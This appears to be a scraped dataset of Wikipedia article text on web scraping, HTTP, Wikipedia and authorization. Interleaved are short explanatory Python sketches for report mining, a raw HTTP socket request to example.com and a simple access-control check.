7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
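The report-mining idea at the end of this entry, pulling structured data back out of a human-readable report file, is easy to prototype in Python. The sketch below is a minimal illustration only: the file name, the skip rules, and the fixed-width column layout are hypothetical assumptions, not taken from the article or from the scraper in this notebook.

import pandas as pd

def mine_report(path="legacy_report.txt"):
    # Minimal report-mining sketch: slice each line of a printed/spooled report
    # into fields. The layout below (cols 0-9 id, 10-39 name, 40-52 amount) is hypothetical.
    records = []
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            line = line.rstrip("\n")
            # Skip blank lines and the headers/separators typical of printed reports
            if not line.strip() or line.startswith(("REPORT", "PAGE", "----")):
                continue
            records.append({
                "id": line[0:10].strip(),
                "name": line[10:40].strip(),
                "amount": float(line[40:53].strip() or 0),
            })
    return pd.DataFrame(records)

# df = mine_report()   # returns the report's rows as a structured DataFrame

Because the input is plain text, the same approach works on a spool file captured from a print queue, which is the scenario the article describes.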
693 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol | HTTP (Hypertext Transfer Protocol) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems. 1 HTTP is the foundation of data communication for the World Wide Web, where hypertext documents include hyperlinks to other resources that the user can easily access, for example by a mouse click or by tapping the screen in a web browser. Development of HTTP was initiated by Tim Berners-Lee at CERN in 1989 and summarized in a simple document describing the behavior of a client and a server using the first HTTP version, named 0.9. 2 That version was subsequently developed, eventually becoming the public 1.0. 3 Development of early HTTP Requests for Comments (RFCs) started a few years later in a coordinated effort by the Internet Engineering Task Force (IETF) and the World Wide Web Consortium (W3C), with work later moving to the IETF. HTTP 1 was finalized and fully documented (as version 1.0) in 1996. 4 It evolved (as version 1.1) in 1997 and then its specifications were updated in 1999, 2014, and 2022. 5 Its secure variant named HTTPS is used by more than 85% of websites. 6 HTTP 2, published in 2015, provides a more efficient expression of HTTP's semantics "on the wire". As of August 2024, update it is supported by 66.2% of websites 7 8 (35.3% HTTP 2 30.9% HTTP 3 with backwards compatibility) and supported by almost all web browsers (over 98% of users). 9 It is also supported by major web servers over Transport Layer Security (TLS) using an Application-Layer Protocol Negotiation (ALPN) extension 10 where TLS 1.2 or newer is required. 11 12 HTTP 3, the successor to HTTP 2, was published in 2022. 13 As of February 2024, update it is now used on 30.9% of websites 14 and is supported by most web browsers, i.e. (at least partially) supported by 97% of users. 15 HTTP 3 uses QUIC instead of TCP for the underlying transport protocol. Like HTTP 2, it does not obsolesce previous major versions of the protocol. Support for HTTP 3 was added to Cloudflare and Google Chrome first, 16 17 and is also enabled in Firefox. 18 HTTP 3 has lower latency for real-world web pages, if enabled on the server, and loads faster than with HTTP 2, in some cases over three times faster than HTTP 1.1 (which is still commonly only enabled). 19 HTTP functions as a request response protocol in the client server model. A web browser, for example, may be the client whereas a process, named web server, running on a computer hosting one or more websites may be the server. The client submits an HTTP request message to the server. The server, which provides resources such as HTML files and other content or performs other functions on behalf of the client, returns a response message to the client. The response contains completion status information about the request and may also contain requested content in its message body. A web browser is an example of a user agent (UA). Other types of user agent include the indexing software used by search providers (web crawlers), voice browsers, mobile apps, and other software that accesses, consumes, or displays web content. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. High-traffic websites often benefit from web cache servers that deliver content on behalf of upstream servers to improve response time. 
Web browsers cache previously accessed web resources and reuse them, whenever possible, to reduce network traffic. HTTP proxy servers at private network boundaries can facilitate communication for clients without a globally routable address, by relaying messages with external servers. To allow intermediate HTTP nodes (proxy servers, web caches, etc.) to accomplish their functions, some of the HTTP headers (found in HTTP requests responses) are managed hop-by-hop whereas other HTTP headers are managed end-to-end (managed only by the source client and by the target web server). HTTP is an application layer protocol designed within the framework of the Internet protocol suite. Its definition presumes an underlying and reliable transport layer protocol. 20 In the latest version HTTP 3, the Transmission Control Protocol (TCP) is no longer used, but the older versions are still more used and they most commonly use TCP. They have also been adapted to use unreliable protocols such as the User Datagram Protocol (UDP), which HTTP 3 also (indirectly) always builds on, for example in HTTPU and Simple Service Discovery Protocol (SSDP). HTTP resources are identified and located on the network by Uniform Resource Locators (URLs), using the Uniform Resource Identifiers (URI's) schemes http and https. As defined in RFC 3986, URIs are encoded as hyperlinks in HTML documents, so as to form interlinked hypertext documents. In HTTP 1.0 a separate TCP connection to the same server is made for every resource request. 21 In HTTP 1.1 instead a TCP connection can be reused to make multiple resource requests (i.e. of HTML pages, frames, images, scripts, stylesheets, etc.). 22 23 HTTP 1.1 communications therefore experience less latency as the establishment of TCP connections presents considerable overhead, especially under high traffic conditions. 24 HTTP 2 is a revision of previous HTTP 1.1 in order to maintain the same client server model and the same protocol methods but with these differences in order: HTTP 2 communications therefore experience much less latency and, in most cases, even higher speeds than HTTP 1.1 communications. HTTP 3 is a revision of previous HTTP 2 in order to use QUIC UDP transport protocols instead of TCP. Before that version, TCP IP connections were used; but now, only the IP layer is used (which UDP, like TCP, builds on). This slightly improves the average speed of communications and to avoid the occasional (very rare) problem of TCP connection congestion that can temporarily block or slow down the data flow of all its streams (another form of "head of line blocking"). The term hypertext was coined by Ted Nelson in 1965 in the Xanadu Project, which was in turn inspired by Vannevar Bush's 1930s vision of the microfilm-based information retrieval and management "memex" system described in his 1945 essay "As We May Think". Tim Berners-Lee and his team at CERN are credited with inventing the original HTTP, along with HTML and the associated technology for a web server and a client user interface called web browser. Berners-Lee designed HTTP in order to help with the adoption of his other idea: the "WorldWideWeb" project, which was first proposed in 1989, now known as the World Wide Web. The first web server went live in 1990. 26 27 The protocol used had only one method, namely GET, which would request a page from a server. 28 The response from the server was always an HTML page. 
2 In 1991, the first documented official version of HTTP was written as a plain document, less than 700 words long, and this version was named HTTP 0.9, which supported only GET method, allowing clients to only retrieve HTML documents from the server, but not supporting any other file formats or information upload. 2 Since 1992, a new document was written to specify the evolution of the basic protocol towards its next full version. It supported both the simple request method of the 0.9 version and the full GET request that included the client HTTP version. This was the first of the many unofficial HTTP 1.0 drafts that preceded the final work on HTTP 1.0. 3 After having decided that new features of HTTP protocol were required and that they had to be fully documented as official RFCs, in early 1995 the HTTP Working Group (HTTP WG, led by Dave Raggett) was constituted with the aim to standardize and expand the protocol with extended operations, extended negotiation, richer meta-information, tied with a security protocol which became more efficient by adding additional methods and header fields. 29 30 The HTTP WG planned to revise and publish new versions of the protocol as HTTP 1.0 and HTTP 1.1 within 1995, but, because of the many revisions, that timeline lasted much more than one year. 31 The HTTP WG planned also to specify a far future version of HTTP called HTTP-NG (HTTP Next Generation) that would have solved all remaining problems, of previous versions, related to performances, low latency responses, etc. but this work started only a few years later and it was never completed. In May 1996, RFC 1945 was published as a final HTTP 1.0 revision of what had been used in previous 4 years as a pre-standard HTTP 1.0 draft which was already used by many web browsers and web servers. In early 1996 developers started to even include unofficial extensions of the HTTP 1.0 protocol (i.e. keep-alive connections, etc.) into their products by using drafts of the upcoming HTTP 1.1 specifications. 32 Since early 1996, major web browsers and web server developers also started to implement new features specified by pre-standard HTTP 1.1 drafts specifications. End-user adoption of the new versions of browsers and servers was rapid. In March 1996, one web hosting company reported that over 40% of browsers in use on the Internet used the new HTTP 1.1 header "Host" to enable virtual hosting, and that by June 1996, 65% of all browsers accessing their servers were pre-standard HTTP 1.1 compliant. 33 In January 1997, RFC 2068 was officially released as HTTP 1.1 specifications. In June 1999, RFC 2616 was released to include all improvements and updates based on previous (obsolete) HTTP 1.1 specifications. Resuming the old 1995 plan of previous HTTP Working Group, in 1997 an HTTP-NG Working Group was formed to develop a new HTTP protocol named HTTP-NG (HTTP New Generation). A few proposals drafts were produced for the new protocol to use multiplexing of HTTP transactions inside a single TCP IP connection, but in 1999, the group stopped its activity passing the technical problems to IETF. 34 In 2007, the IETF HTTP Working Group (HTTP WG bis or HTTPbis) was restarted firstly to revise and clarify previous HTTP 1.1 specifications and secondly to write and refine future HTTP 2 specifications (named httpbis). 35 36 In 2009, Google, a private company, announced that it had developed and tested a new HTTP binary protocol named SPDY. 
The implicit aim was to greatly speed up web traffic (specially between future web browsers and its servers). SPDY was indeed much faster than HTTP 1.1 in many tests and so it was quickly adopted by Chromium and then by other major web browsers. 37 Some of the ideas about multiplexing HTTP streams over a single TCP IP connection were taken from various sources, including the work of W3C HTTP-NG Working Group. In January March 2012, HTTP Working Group (HTTPbis) announced the need to start to focus on a new HTTP 2 protocol (while finishing the revision of HTTP 1.1 specifications), maybe taking in consideration ideas and work done for SPDY. 38 39 After a few months about what to do to develop a new version of HTTP, it was decided to derive it from SPDY. 40 In May 2015, HTTP 2 was published as RFC 7540 and quickly adopted by all web browsers already supporting SPDY and more slowly by web servers. In June 2014, the HTTP Working Group released an updated six-part HTTP 1.1 specification obsoleting RFC 2616: In RFC 7230 Appendix-A, HTTP 0.9 was deprecated for servers supporting HTTP 1.1 version (and higher): 41 Since HTTP 0.9 did not support header fields in a request, there is no mechanism for it to support name-based virtual hosts (selection of resource by inspection of the Host header field). Any server that implements name-based virtual hosts ought to disable support for HTTP 0.9. Most requests that appear to be HTTP 0.9 are, in fact, badly constructed HTTP 1.x requests caused by a client failing to properly encode the request-target. Since 2016 many product managers and developers of user agents (browsers, etc.) and web servers have begun planning to gradually deprecate and dismiss support for HTTP 0.9 protocol, mainly for the following reasons: 42 note 2 In 2020, the first drafts HTTP 3 were published and major web browsers and web servers started to adopt it. On 6 June 2022, IETF standardized HTTP 3 as RFC 9114. 43 In June 2022, a batch of RFCs was published, deprecating many of the previous documents and introducing a few minor changes and a refactoring of HTTP semantics description into a separate document. HTTP is a stateless application-level protocol and it requires a reliable network transport connection to exchange data between client and server. 20 In HTTP implementations, TCP IP connections are used using well-known ports (typically port 80 if the connection is unencrypted or port 443 if the connection is encrypted, see also List of TCP and UDP port numbers). 44 45 In HTTP 2, a TCP IP connection plus multiple protocol channels are used. In HTTP 3, the application transport protocol QUIC over UDP is used. Data is exchanged through a sequence of request response messages which are exchanged by a session layer transport connection. 20 An HTTP client initially tries to connect to a server establishing a connection (real or virtual). An HTTP(S) server listening on that port accepts the connection and then waits for a client's request message. The client sends its HTTP request message. Upon receiving the request the server sends back an HTTP response message, which includes header(s) plus a body if it is required. The body of this response message is typically the requested resource, although an error message or other information may also be returned. At any time (for many reasons) client or server can close the connection. Closing a connection is usually advertised in advance by using one or more HTTP headers in the last request response message sent to server or client. 
22 In HTTP 0.9, the TCP IP connection is always closed after server response has been sent, so it is never persistent. In HTTP 1.0, as stated in RFC 1945, the TCP IP connection should always be closed by server after a response has been sent. note 3 In HTTP 1.1 a keep-alive-mechanism was officially introduced so that a connection could be reused for more than one request response. Such persistent connections reduce request latency perceptibly because the client does not need to re-negotiate the TCP 3 Way-Handshake connection after the first request has been sent. Another positive side effect is that, in general, the connection becomes faster with time due to TCP's slow-start-mechanism. HTTP 1.1 added also HTTP pipelining in order to further reduce lag time when using persistent connections by allowing clients to send multiple requests before waiting for each response. This optimization was never considered really safe because a few web servers and many proxy servers, specially transparent proxy servers placed in Internet Intranets between clients and servers, did not handle pipelined requests properly (they served only the first request discarding the others, they closed the connection because they saw more data after the first request or some proxies even returned responses out of order etc.). Because of this, only HEAD and some GET requests (i.e. limited to real file requests and so with URLs without query string used as a command, etc.) could be pipelined in a safe and idempotent mode. After many years of struggling with the problems introduced by enabling pipelining, this feature was first disabled and then removed from most browsers also because of the announced adoption of HTTP 2. HTTP 2 extended the usage of persistent connections by multiplexing many concurrent requests responses through a single TCP IP connection. HTTP 3 does not use TCP IP connections but QUIC UDP (see also: technical overview). HTTP provides multiple authentication schemes such as basic access authentication and digest access authentication which operate via a challenge response mechanism whereby the server identifies and issues a challenge before serving the requested content. HTTP provides a general framework for access control and authentication, via an extensible set of challenge response authentication schemes, which can be used by a server to challenge a client request and by a client to provide authentication information. 1 The authentication mechanisms described above belong to the HTTP protocol and are managed by client and server HTTP software (if configured to require authentication before allowing client access to one or more web resources), and not by the web applications using a web application session. The HTTP Authentication specification also provides an arbitrary, implementation-specific construct for further dividing resources common to a given root URI. The realm value string, if present, is combined with the canonical root URI to form the protection space component of the challenge. This in effect allows the server to define separate authentication scopes under one root URI. 1 HTTP is a stateless protocol. A stateless protocol does not require the web server to retain information or status about each user for the duration of multiple requests. Some web applications need to manage user sessions, so they implement states, or server side sessions, using for instance HTTP cookies 46 or hidden variables within web forms. 
To start an application user session, an interactive authentication via web application login must be performed. To stop a user session a logout operation must be requested by user. These kind of operations do not use HTTP authentication but a custom managed web application authentication. Request messages are sent by a client to a target server. note 4 A client sends request messages to the server, which consist of: 47 In the HTTP 1.1 protocol, all header fields except Host: hostname are optional. A request line containing only the path name is accepted by servers to maintain compatibility with HTTP clients before the HTTP 1.0 specification in RFC 1945. 48 HTTP defines methods (sometimes referred to as verbs, but nowhere in the specification does it mention verb) to indicate the desired action to be performed on the identified resource. What this resource represents, whether pre-existing data or data that is generated dynamically, depends on the implementation of the server. Often, the resource corresponds to a file or the output of an executable residing on the server. The HTTP 1.0 specification 49 defined the GET, HEAD, and POST methods as well as listing the PUT, DELETE, LINK and UNLINK methods under additional methods. However, the HTTP 1.1 specification 50 formally defined and added five new methods: PUT, DELETE, CONNECT, OPTIONS, and TRACE. Any client can use any method and the server can be configured to support any combination of methods. If a method is unknown to an intermediate, it will be treated as an unsafe and non-idempotent method. There is no limit to the number of methods that can be defined, which allows for future methods to be specified without breaking existing infrastructure. For example, WebDAV defined seven new methods and RFC 5789 specified the PATCH method. Method names are case sensitive. 51 52 This is in contrast to HTTP header field names which are case-insensitive. 53 All general-purpose web servers are required to implement at least the GET and HEAD methods, and all other methods are considered optional by the specification. 52 A request method is safe if a request with that method has no intended effect on the server. The methods GET, HEAD, OPTIONS, and TRACE are defined as safe. In other words, safe methods are intended to be read-only. Safe methods can still have side effects not seen by the client, such as appending request information to a log file or charging an advertising account. In contrast, the methods POST, PUT, DELETE, CONNECT, and PATCH are not safe. They may modify the state of the server or have other effects such as sending an email. Such methods are therefore not usually used by conforming web robots or web crawlers; some that do not conform tend to make requests without regard to context or consequences. Despite the prescribed safety of GET requests, in practice their handling by the server is not technically limited in any way. Careless or deliberately irregular programming can allow GET requests to cause non-trivial changes on the server. This is discouraged because of the problems which can occur when web caching, search engines, and other automated agents make unintended changes on the server. For example, a website might allow deletion of a resource through a URL such as https: example.com article 1234 delete, which, if arbitrarily fetched, even using GET, would simply delete the article. 60 A properly coded website would require a DELETE or POST method for this action, which non-malicious bots would not make. 
One example of this occurring in practice was during the short-lived Google Web Accelerator beta, which prefetched arbitrary URLs on the page a user was viewing, causing records to be automatically altered or deleted en masse. The beta was suspended only weeks after its first release, following widespread criticism. 61 60 A request method is idempotent if multiple identical requests with that method have the same effect as a single such request. The methods PUT and DELETE, and safe methods are defined as idempotent. Safe methods are trivially idempotent, since they are intended to have no effect on the server whatsoever; the PUT and DELETE methods, meanwhile, are idempotent since successive identical requests will be ignored. A website might, for instance, set up a PUT endpoint to modify a user's recorded email address. If this endpoint is configured correctly, any requests which ask to change a user's email address to the same email address which is already recorded—e.g. duplicate requests following a successful request—will have no effect. Similarly, a request to DELETE a certain user will have no effect if that user has already been deleted. In contrast, the methods POST, CONNECT, and PATCH are not necessarily idempotent, and therefore sending an identical POST request multiple times may further modify the state of the server or have further effects, such as sending multiple emails. In some cases this is the desired effect, but in other cases it may occur accidentally. A user might, for example, inadvertently send multiple POST requests by clicking a button again if they were not given clear feedback that the first click was being processed. While web browsers may show alert dialog boxes to warn users in some cases where reloading a page may re-submit a POST request, it is generally up to the web application to handle cases where a POST request should not be submitted more than once. Note that whether or not a method is idempotent is not enforced by the protocol or web server. It is perfectly possible to write a web application in which (for example) a database insert or other non-idempotent action is triggered by a GET or other request. To do so against recommendations, however, may result in undesirable consequences, if a user agent assumes that repeating the same request is safe when it is not. A request method is cacheable if responses to requests with that method may be stored for future reuse. The methods GET, HEAD, and POST are defined as cacheable. In contrast, the methods PUT, DELETE, CONNECT, OPTIONS, TRACE, and PATCH are not cacheable. Request header fields allow the client to pass additional information beyond the request line, acting as request modifiers (similarly to the parameters of a procedure). They give information about the client, about the target resource, or about the expected handling of the request. A response message is sent by a server to a client as a reply to its former request message. note 4 A server sends response messages to the client, which consist of: 47 In HTTP 1.0 and since, the first line of the HTTP response is called the status line and includes a numeric status code (such as "404") and a textual reason phrase (such as "Not Found"). The response status code is a three-digit integer code representing the result of the server's attempt to understand and satisfy the client's corresponding request. The way the client handles the response depends primarily on the status code, and secondarily on the other response header fields. 
Clients may not understand all registered status codes but they must understand their class (given by the first digit of the status code) and treat an unrecognized status code as being equivalent to the x00 status code of that class. The standard reason phrases are only recommendations, and can be replaced with "local equivalents" at the web developer's discretion. If the status code indicated a problem, the user agent might display the reason phrase to the user to provide further information about the nature of the problem. The standard also allows the user agent to attempt to interpret the reason phrase, though this might be unwise since the standard explicitly specifies that status codes are machine-readable and reason phrases are human-readable. The first digit of the status code defines its class: The response header fields allow the server to pass additional information beyond the status line, acting as response modifiers. They give information about the server or about further access to the target resource or related resources. Each response header field has a defined meaning which can be further refined by the semantics of the request method or response status code. Below is a sample HTTP transaction between an HTTP 1.1 client and an HTTP 1.1 server running on www.example.com, port 80. note 5 note 6 A client request (consisting in this case of the request line and a few headers that can be reduced to only the "Host: hostname" header) is followed by a blank line, so that the request ends with a double end of line, each in the form of a carriage return followed by a line feed. The "Host: hostname" header value distinguishes between various DNS names sharing a single IP address, allowing name-based virtual hosting. While optional in HTTP 1.0, it is mandatory in HTTP 1.1. (A (slash) will usually fetch a index.html file if there is one.) The ETag (entity tag) header field is used to determine if a cached version of the requested resource is identical to the current version of the resource on the server. "Content-Type" specifies the Internet media type of the data conveyed by the HTTP message, while "Content-Length" indicates its length in bytes. The HTTP 1.1 webserver publishes its ability to respond to requests for certain byte ranges of the document by setting the field "Accept-Ranges: bytes". This is useful, if the client needs to have only certain portions 62 of a resource sent by the server, which is called byte serving. When "Connection: close" is sent, it means that the web server will close the TCP connection immediately after the end of the transfer of this response. 22 Most of the header lines are optional but some are mandatory. When header "Content-Length: number" is missing in a response with an entity body then this should be considered an error in HTTP 1.0 but it may not be an error in HTTP 1.1 if header "Transfer-Encoding: chunked" is present. Chunked transfer encoding uses a chunk size of 0 to mark the end of the content. Some old implementations of HTTP 1.0 omitted the header "Content-Length" when the length of the body entity was not known at the beginning of the response and so the transfer of data to client continued until server closed the socket. A "Content-Encoding: gzip" can be used to inform the client that the body entity part of the transmitted data is compressed by gzip algorithm. The most popular way of establishing an encrypted HTTP connection is HTTPS. 
63 Two other methods for establishing an encrypted HTTP connection also exist: Secure Hypertext Transfer Protocol, and using the HTTP 1.1 Upgrade header to specify an upgrade to TLS. Browser support for these two is, however, nearly non-existent. 64 65 66 |
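The request/response exchange described in this entry can be made concrete with a few lines of socket code. This is only a sketch of the wire format: the host name example.com, the port, and the headers shown are illustrative assumptions, and the scraper in this notebook continues to use the requests library (and Tor) rather than raw sockets.

import socket

host = "example.com"                 # illustrative host only
request = (
    "GET / HTTP/1.1\r\n"
    f"Host: {host}\r\n"              # mandatory in HTTP/1.1 (name-based virtual hosting)
    "Connection: close\r\n"          # ask the server to close the connection after replying
    "\r\n"                           # blank line ends the header section
)

with socket.create_connection((host, 80), timeout=10) as sock:
    sock.sendall(request.encode("ascii"))
    raw = b""
    while chunk := sock.recv(4096):  # read until the server closes the connection
        raw += chunk

status_line, _, rest = raw.partition(b"\r\n")
print(status_line.decode())          # e.g. an HTTP/1.1 status line: version, status code, reason phrase
headers, _, body = rest.partition(b"\r\n\r\n")
print(headers.decode(errors="replace"))

The blank line after the headers, the Host header, and the Connection: close header correspond directly to the message structure and connection behaviour described in the text above.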
694 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:About | Wikipedia is a free online encyclopedia that anyone can edit, and millions already have. Wikipedia's purpose is to benefit readers by presenting information on all branches of knowledge. Hosted by the Wikimedia Foundation, it consists of freely editable content, whose articles also have numerous links to guide readers towards more information. Written collaboratively by largely anonymous volunteers known as Wikipedians, Wikipedia articles can be edited by anyone with Internet access, except in limited cases where editing is restricted to prevent disruption or vandalism. Since its creation on January 15, 2001, it has grown into the world's largest reference website, attracting over a billion visitors monthly. Wikipedia currently has more than sixty-three million articles in more than 300 languages, including 6,868,487 articles in English, with 113,813 active contributors in the past month. Wikipedia's fundamental principles are summarized in its five pillars. The Wikipedia community has developed many policies and guidelines, although editors do not need to be familiar with them before contributing. Anyone can edit Wikipedia's text, references, and images. What is written is more important than who writes it. The content must conform with Wikipedia's policies, including being verifiable by published sources. Editors' opinions, beliefs, personal experiences, unreviewed research, libelous material, and copyright violations will not remain. Wikipedia's software allows easy reversal of errors, and experienced editors watch and patrol bad edits. Wikipedia differs from printed references in important ways. It is continually created and updated, and encyclopedic articles on new events appear within minutes rather than months or years. Because anyone can improve Wikipedia, it has become more comprehensive than any other encyclopedia. Its contributors enhance its articles' quality and quantity, and remove misinformation, errors and vandalism. Any reader can fix a mistake or add more information to what has already been written (see Researching with Wikipedia). Begin by simply clicking the Edit or Edit source buttons or the pencil icon at the top of any non-protected page or section. Wikipedia has tested the wisdom of the crowd since 2001 and found that it succeeds. |
695 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Authorization | Authorization or authorisation (see spelling differences) is the function of specifying access rights privileges to resources, which is related to general information security and computer security, and to access control in particular. 1 More formally, "to authorize" is to define an access policy. For example, human resources staff are normally authorized to access employee records and this policy is often formalized as access control rules in a computer system. During operation, the system uses the access control rules to decide whether access requests from (authenticated) consumers shall be approved (granted) or disapproved (rejected). 2 Resources include individual files or an item's data, computer programs, computer devices and functionality provided by computer applications. Examples of consumers are computer users, computer software and other hardware on the computer. Access control in computer systems and networks rely on access policies. The access control process can be divided into the following phases: policy definition phase where access is authorized, and policy enforcement phase where access requests are approved or disapproved. Authorization is the function of the policy definition phase which precedes the policy enforcement phase where access requests are approved or disapproved based on the previously defined authorizations. Most modern, multi-user operating systems include role-based access control (RBAC) and thereby rely on authorization. Access control also uses authentication to verify the identity of consumers. When a consumer tries to access a resource, the access control process checks that the consumer has been authorized to use that resource. Authorization is the responsibility of an authority, such as a department manager, within the application domain, but is often delegated to a custodian such as a system administrator. Authorizations are expressed as access policies in some types of "policy definition application", e.g. in the form of an access control list or a capability, or a policy administration point e.g. XACML. On the basis of the "principle of least privilege": consumers should only be authorized to access whatever they need to do their jobs. Older and single user operating systems often had weak or non-existent authentication and access control systems. "Anonymous consumers" or "guests", are consumers that have not been required to authenticate. They often have limited authorization. On a distributed system, it is often desirable to grant access without requiring a unique identity. Familiar examples of access tokens include keys, certificates and tickets: they grant access without proving identity. Trusted consumers are often authorized for unrestricted access to resources on a system, but must be verified so that the access control system can make the access approval decision. "Partially trusted" and guests will often have restricted authorization in order to protect resources against improper access and usage. The access policy in some operating systems, by default, grant all consumers full access to all resources. Others do the opposite, insisting that the administrator explicitly authorizes a consumer to use each resource. 
Even when access is controlled through a combination of authentication and access control lists, the problems of maintaining the authorization data is not trivial, and often represents as much administrative burden as managing authentication credentials. It is often necessary to change or remove a user's authorization: this is done by changing or deleting the corresponding access rules on the system. Using atomic authorization is an alternative to per-system authorization management, where a trusted third party securely distributes authorization information. In public policy, authorization is a feature of trusted systems used for security or social control. In banking, an authorization is a hold placed on a customer's account when a purchase is made using a debit card or credit card. In publishing, sometimes public lectures and other freely available texts are published without the approval of the author. These are called unauthorized texts. An example is the 2002 'The Theory of Everything: The Origin and Fate of the Universe' , which was collected from Stephen Hawking's lectures and published without his permission as per copyright law. citation needed |
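The split the article draws between a policy definition phase and a policy enforcement phase can be sketched with a tiny role-based check. The roles, resources, and rule table below are hypothetical examples, not drawn from any real system.

# Policy definition phase: an authority records who may do what (hypothetical rules).
ACCESS_POLICY = {
    ("hr_staff", "employee_records"): {"read", "update"},
    ("employee", "employee_records"): {"read_own"},
}

# Policy enforcement phase: each request is approved or rejected against the defined policy.
def is_authorized(role: str, resource: str, action: str) -> bool:
    return action in ACCESS_POLICY.get((role, resource), set())

print(is_authorized("hr_staff", "employee_records", "update"))  # True  (granted)
print(is_authorized("employee", "employee_records", "update"))  # False (rejected)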
696 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-22 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
